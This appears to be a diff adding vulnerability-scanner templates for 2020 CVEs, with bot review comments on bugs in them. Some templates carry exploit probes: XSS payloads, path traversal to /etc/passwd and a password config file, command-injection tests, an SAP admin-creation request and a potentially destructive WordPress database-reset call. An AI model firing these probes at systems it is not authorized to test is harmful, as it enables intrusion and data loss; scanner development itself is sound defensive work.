METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2140 - Jenkin AuditTrailPlugin XSS'
URI="/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s --insecure -L "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS'
URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-25213 - WP File Manager File Upload'
URI="/wp-content/plugins/wp-file-manager/readme.txt"
METHOD='GET'
MATCH="(Stable\stag\:\s[0-6]\.[0-8])"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution'
URI='/console/login/LoginForm.jsp'
METHOD='GET'
MATCH="10\.3\.6\.0|12\.1\.3\.0|12\.2\.1\.3|12\.2\.1\.4"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE'
URI="/console/login/LoginForm.jsp"
METHOD='GET'
MATCH="WebLogic"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion'
URI="/+CSCOE+/session_password.html"
METHOD='GET'
MATCH="webvpn"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
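Review bot: `VULN_NAME` attributes this check to Citrix, but the `/+CSCOE+/` path in `URI` is the Cisco WebVPN prefix used by the Cisco templates later in this commit, and CVE-2020-3187 is a Cisco ASA/FTD advisory. Suggested: `VULN_NAME='CVE-2020-3187 - Cisco ASA/FTD Unauthenticated File Deletion'`. The `webvpn` match on a HEAD response only indicates that a WebVPN portal is present, so the critical rating should be backed by a version condition or lowered.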


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability'
URI='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
METHOD='GET'
MATCH="INTERNAL_PASSWORD_ENABLED|CONF_VIRTUAL_KEYBOARD"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal'
URI="/_next/static/../server/pages-manifest.json"
METHOD='GET'
MATCH='\{\"/_app\":\".*?_app\.js\"'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 1'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2'
URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../Windows/win.ini"
METHOD='GET'
MATCH="root:*:|nameserver|\[extensions\]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
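Review bot: `VULN_NAME` repeats 'Spring Directory Traversal 2' from the previous template although this one requests `Windows/win.ini`, so the two findings cannot be told apart in a report; `VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 3'` keeps the numbering consistent. All three variants share one `MATCH` with three alternatives, which means a response can satisfy a pattern meant for a different file; limiting each template to the pattern for the file it requests (here `\[extensions\]`) would make a hit easier to interpret.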


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix'
URI="/proxy.stream?origin=http://burpcollaborator.net/"
METHOD='GET'
MATCH="Burp\ Collaborator\ Server"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 1'
URI='/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp'
METHOD='GET'
MATCH='divGeneralRemoteSettingsTable'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA'
URI="/CTCWebService/CTCWebServiceBean/ConfigServlet"
METHOD='POST'
MATCH="CTCWebServiceSi"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
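Review bot: The SOAP body on the `CURL_OPTS` line still contains the placeholder `{{base64('data')}}`, which looks like syntax from a different template engine and is presumably sent to the target literally, so the request does not carry meaningful content. `MATCH="CTCWebServiceSi"` is also a string taken from the request's own namespace, so any response that echoes or describes the service matches whether or not the system is patched. The unescaped double quotes inside the double-quoted value drop the XML attribute quoting as well. I would reduce this to an unauthenticated reachability check of the endpoint and label it as such in `VULN_NAME`.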


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset'
URI='/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111'
METHOD='GET'
MATCH='X-Redirect-By\:\ WordPress'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -I"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
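Review bot: The query string in `URI` names a table (`db-reset-tables%5B%5D=comments`) together with matching reset codes, so on an affected site this request may carry out the reset it is meant to detect rather than merely probe for it; whether `-I` (HEAD) prevents that is not something the template can rely on. A scanner check should not be able to destroy data on a production target. A passive condition, such as the plugin version read from its readme in the way the CVE-2020-25213 template does, is the safer design. The `X-Redirect-By: WordPress` match is returned by WordPress sites in general, so it does not confirm the plugin is installed either.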


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution'
URI="/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
METHOD='GET'
MATCH='nonexistent'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution'
URI="/"
METHOD='GET'
MATCH='qdPM 9.'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access'
URI="/UploadTest.aspx"
METHOD='GET'
MATCH="content\-length\:\ 0"
SEVERITY='P2 - HIGH'
CURL_OPTS='-L -I --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,12 @@
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox
url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
response = webdriver.request('GET', '%s/www/delivery/afr.php?refresh=10000&")\',10000000);document.write(1+1336);setTimeout(\'alert("' % url)
if '1337' in response.text:
print("Vulnerable!")
webdriver.quit()


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8115 - Revive Adserver XSS'
URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
METHOD='GET'
MATCH="\);alert\(1\);setTimeout\('alert\(\"&loc='"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
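Review bot: `MATCH` looks for `alert\(1\)` while the `URI` sends `alert(1337)`, so a reflected response can never satisfy the pattern and affected hosts are reported clean. The two need to agree, e.g. `alert\(1337\)` in `MATCH`. The trailing `&loc='` in the pattern also assumes a specific reflection context that should be confirmed against a known-affected response before the check is trusted.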


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8163 - Rails < 5.0.1 Remote Code Execution'
URI='/?system(%27echo+$((1%2B1787568))%27)%3ba%23'
METHOD='GET'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS'
URI="/menu/stapp"
METHOD='POST'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P1 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a</title><svg/onload=alert(1337)>&au=1&username=nsroot'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
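Review bot: `SEVERITY='P1 - HIGH'` does not exist in the scale the other templates use (`P1 - CRITICAL`, `P2 - HIGH`, `P3 - MEDIUM`, `P5 - INFO`), so anything that filters or sorts on the severity string will mis-bucket this finding; for a reflected XSS `SEVERITY='P2 - HIGH'` matches the sibling checks. On the `CURL_OPTS` line, `-H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6'` has an unbalanced single quote and looks like two headers merged into one, so the option string does not tokenize the way the author intended.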


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI'
URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
METHOD='POST'
MATCH="SESSID"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data '<appfwprofile><login></login></appfwprofile>'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection'
URI="/menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo"
METHOD='GET'
MATCH="<jnlp codebase=\"nonexistent.1337\">"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties'
METHOD='GET'
MATCH="database\.password"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal'
URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS'
URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"
METHOD='GET'
MATCH="<svg\/onload\=alert\(document\.domain\)>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8772 - InfiniteWP Client 1.9.4.5 - Authentication Bypass 1'
URI='/wp-admin/'
METHOD='POST'
MATCH="IWPHEADER"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' --data '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read'
URI="/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
METHOD='GET'
MATCH="bit\ app\ support"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s --insecure "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution'
URI="/version.web"
METHOD='GET'
MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
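Review bot: This P1 finding rests only on a version string, and the alternatives in MATCH are unanchored, so `7\.0\.2\.81005` also matches inside `17.0.2.81005` and `19\.09\.4\.0` matches `19.09.4.01`. Whole-word matching, e.g. `GREP_OPTIONS='-i -w'` (if the engine passes several options through), would restrict hits to complete version tokens. Since nothing beyond the banner is checked, a comment such as `# version fingerprint only; confirm patch level before reporting` would keep the CRITICAL label from being read as a confirmed issue.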


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution'
URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1787568))"
METHOD='GET'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization'
URI="/index.jsp"
METHOD='GET'
MATCH='ObjectInputStream|PersistentManagerBase'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection'
URI="/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
METHOD='GET'
MATCH="22344"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Cisco VPN Login Detected'
URI='/+CSCOE+/logon.html'
METHOD='GET'
MATCH="CSCO_Format"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Cisco VPN Detected'
URI='/+CSCOE+/win.js'
METHOD='GET'
MATCH="CSCO_WebVPN"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Citrix-Access-Gateway Detected'
URI='/vpn/index.html'
METHOD='GET'
MATCH='Netscaler Gateway'
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
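Review bot: This template and the two that follow (`Citrix VPN Detected`, `Citrix VPN Detected 2`) request the same `/vpn/index.html`, and under `-i` the pattern `NetScaler ` matches every response that `Netscaler Gateway` matches, so one gateway yields three P5 findings. `'Netscaler Gateway'` here and `"Netscaler\ Gateway"` in the next file appear to be the same pattern written two ways. Keeping a single template would remove the duplicate report lines and two extra requests per target.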


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Citrix VPN Detected'
URI='/vpn/index.html'
METHOD='GET'
MATCH="Netscaler\ Gateway"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Citrix VPN Detected 2'
URI='/vpn/index.html'
METHOD='GET'
MATCH="NetScaler "
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Clear-Text Protocol - HTTP'
URI='/'
METHOD='GET'
MATCH='200 OK'
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
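Review bot: `MATCH='200 OK'` looks for a status line, but CURL_OPTS is `--user-agent '' -s` with neither `-I` nor `-i`, so curl prints only the body. The status line is never in the output unless the engine adds header output itself. As written, the check would either never fire or fire on a page that happens to contain the text `200 OK`. `CURL_OPTS="--user-agent '' -s -I"`, as the Clickjacking template uses, would put the status line in the output. A server that only redirects to HTTPS would then correctly not match.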


@@ -0,0 +1,10 @@
AUTHOR='@xer0dayz'
VULN_NAME='Clickjacking'
URI='/'
METHOD='GET'
MATCH='X-Frame-Options'
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -I"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
SEARCH="negative"
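Review bot: With `SEARCH="negative"` the finding is raised whenever `X-Frame-Options` is absent from the output, which presumably includes the case where curl returns nothing at all. CURL_OPTS here has no `--insecure`, unlike most other templates, so a TLS failure would be reported as Clickjacking. Sites that restrict framing with `Content-Security-Policy: frame-ancestors` instead of the older header are also flagged. `MATCH='X-Frame-Options|frame-ancestors'` covers the second case, if MATCH is treated as an extended regex as the `|` in other templates suggests. The first case needs the engine to require a non-empty response, which is outside this file.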


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 1'
URI='/.perf'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 2'
URI='/server-status'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Common Status File Detected 3'
URI='/status.html'
METHOD='GET'
MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue"
SEVERITY='P4 - LOW'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Atlassian Confluence Detected'
URI='/'
METHOD='GET'
MATCH="Atlassian\ Confluence"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
